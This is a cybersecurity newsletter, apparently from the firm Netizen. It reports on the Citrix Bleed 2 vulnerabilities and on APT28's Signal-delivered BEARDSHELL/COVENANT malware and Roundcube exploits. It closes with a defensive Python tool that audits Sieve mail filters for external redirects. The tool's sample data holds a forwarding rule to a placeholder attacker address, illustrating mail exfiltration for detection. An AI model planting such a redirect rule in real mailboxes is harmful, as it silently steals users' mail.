Today’s Topics:
- Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack
- APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine
- How Can Netizen Help?
Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack

On June 30, 2025, cybersecurity experts reported that more than 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online remain unpatched against a critical vulnerability, CVE-2025-5777, which is believed to be actively exploited. The flaw, referred to as “Citrix Bleed 2,” is an out-of-bounds memory read caused by insufficient input validation. Because the read exposes restricted memory regions of public-facing gateways and virtual servers, successful exploitation could leak session tokens, credentials, and other sensitive data, allowing attackers to bypass authentication, hijack user sessions, and defeat multi-factor authentication (MFA).
Citrix previously experienced a similar issue, “CitrixBleed,” which was exploited in ransomware attacks in 2023; attackers used it against government organizations and then moved laterally across the compromised networks. The newly discovered vulnerability, CVE-2025-5777, is rated critical, and Citrix issued an advisory on June 17, 2025, urging customers to upgrade their appliances and terminate all active ICA and PCoIP sessions to block potential attacks.
Although Citrix has not yet confirmed public exploitation of CVE-2025-5777, security researchers from ReliaQuest assessed with medium confidence that the vulnerability is actively being exploited in targeted attacks. These attacks have shown indicators of post-exploitation activity, including hijacked Citrix web sessions, MFA bypass attempts, and suspicious LDAP queries linked to Active Directory reconnaissance. Additionally, security analysts from the Shadowserver Foundation discovered that over 2,100 Citrix NetScaler appliances were also unpatched against another critical vulnerability, CVE-2025-6543, which is currently being exploited in denial-of-service (DoS) attacks.
Both CVE-2025-5777 and CVE-2025-6543 are classified as critical severity vulnerabilities, prompting cybersecurity experts to advise administrators to immediately deploy the latest patches from Citrix to mitigate potential risks. Companies are also encouraged to review access controls and monitor their Citrix NetScaler appliances for unusual user sessions and activities to prevent further exploitation.
APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about a new cyberattack campaign carried out by the Russian-linked APT28 (also known as UAC-0001) threat group. This campaign uses Signal chat messages to distribute two previously undetected malware families, BEARDSHELL and COVENANT, targeting Ukrainian entities.
According to CERT-UA, BEARDSHELL is a C++-based malware that allows threat actors to download and execute PowerShell scripts and upload the results to a remote server via the Icedrive API. The malware was first observed in March-April 2024 during incident response efforts on a Windows machine. At the time, the exact infection method was unknown, but recent intelligence from ESET linked the malware to a breach of a “gov.ua” email account, likely indicating government-targeted attacks.
Further investigation led to the discovery of the malware framework COVENANT, which operates as part of a multi-layered attack. In the campaign, APT28 is using Signal messages to send malicious macro-laden Microsoft Word documents. When opened, these documents drop two payloads: a malicious DLL (“ctec.dll”) and a PNG image (“windows.png”). The embedded macro also modifies the Windows Registry so that the DLL is loaded the next time Windows File Explorer is launched. The DLL’s primary function is to execute shellcode embedded in the PNG, which starts the COVENANT framework.
COVENANT subsequently downloads two additional payloads that facilitate the execution of the BEARDSHELL backdoor on compromised systems. The BEARDSHELL backdoor provides persistent access to the infected systems, allowing threat actors to maintain long-term control.
The malware is delivered via Signal chat, taking advantage of the Signal app’s encrypted file delivery, which makes the delivery stage harder to trace. For those defending against this threat, CERT-UA recommends monitoring network traffic associated with domains like “app.koofr[.]net” and “api.icedrive[.]net,” which are used for communication with the malware’s command-and-control servers.
In parallel with this malware campaign, APT28 has been targeting outdated versions of the Roundcube webmail software used in Ukrainian organizations. Exploiting vulnerabilities such as CVE-2020-35730, CVE-2021-44026, and CVE-2020-12641, APT28 is delivering malicious JavaScript payloads through phishing emails. These emails pose as news articles but, once opened, exploit the vulnerabilities to execute arbitrary JavaScript, exfiltrate user data, and install further malware on the victim’s system.
One of the scripts, “e.js,” creates a mailbox rule to redirect incoming emails to a third-party address, while exfiltrating session cookies and the victim’s address book. The second, “q.js,” exploits an SQL injection vulnerability in Roundcube to extract information from the Roundcube database. A third file, “c.js,” exploits another vulnerability to execute arbitrary commands on the mail server.
These vulnerabilities were leveraged in phishing emails sent to over 40 Ukrainian organizations, highlighting the group’s persistence and evolving tactics. CERT-UA continues to monitor these activities and urges organizations to patch vulnerabilities, implement robust email security filters, and monitor network traffic for any signs of compromise.
To defend against these threats, CERT-UA advises organizations to:
- Ensure all systems are up to date with the latest patches.
- Disable macros in Microsoft Word and other Office applications.
- Monitor network traffic for unusual activity related to Icedrive and Koofr domains.
- Regularly audit email systems for signs of compromise, particularly for suspicious redirection or exfiltration activity.
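Roundcube stores a user’s mail filters (via its managesieve plugin) as Sieve scripts, so the mailbox-redirect rule that the “e.js” script creates ends up as a Sieve `redirect` action. The following is an added Python example, not code from CERT-UA or this article, that audits such scripts for redirects to addresses outside the organization’s own domains; the sample scripts, addresses, and `corp.example` domain are constructed placeholders.

```python
import re
from typing import Dict, List

# Constructed sample Sieve scripts for three mailboxes. Only "bob" contains
# the kind of external-redirect rule described in the CERT-UA report; the
# addresses and domains are placeholders, not real indicators.
SAMPLE_SCRIPTS: Dict[str, str] = {
    "alice": 'require ["fileinto"];\n'
             'if header :contains "subject" "invoice" {\n'
             '  fileinto "Finance";\n}\n',
    "bob":   'require ["copy"];\n'
             '# keep a copy locally and silently forward everything\n'
             'redirect :copy "collector@attacker-placeholder.example";\n',
    "carol": 'redirect "carol.backup@corp.example";\nkeep;\n',
}

# Assumption: the organization's legitimate mail domains.
ORG_DOMAINS = {"corp.example"}

# Matches `redirect "addr";` and `redirect :copy "addr";` (RFC 5228 / RFC 3894).
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:copy)?\s+"([^"]+)"', re.IGNORECASE)


def find_redirects(script: str) -> List[str]:
    """Return every redirect target address in a Sieve script.

    Hash comments are stripped first so commented-out rules are ignored.
    (Bracketed /* */ comments and '#' inside string literals are not handled.)
    """
    code = "\n".join(line.split("#", 1)[0] for line in script.splitlines())
    return REDIRECT_RE.findall(code)


def is_external(address: str, org_domains=ORG_DOMAINS) -> bool:
    """True if the address domain is not one of the organization's domains."""
    domain = address.rsplit("@", 1)[-1].lower()
    return domain not in org_domains


def audit_sieve(scripts: Dict[str, str], org_domains=ORG_DOMAINS) -> List[Dict[str, str]]:
    """Flag each redirect whose target lies outside the organization."""
    findings = []
    for user, script in scripts.items():
        for target in find_redirects(script):
            if is_external(target, org_domains):
                findings.append({"user": user, "target": target})
    return findings


if __name__ == "__main__":
    for f in audit_sieve(SAMPLE_SCRIPTS):
        print(f"{f['user']}: external redirect to {f['target']}")
```

In a real deployment the scripts would be pulled from the Sieve store for every mailbox; a redirect to an external domain that the user did not create is the signal to investigate.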
How Can Netizen Help?
Netizen ensures that security gets built in, not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as our popular “CISO-as-a-Service,” through which companies can leverage the expertise of executive-level cybersecurity professionals without bearing the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
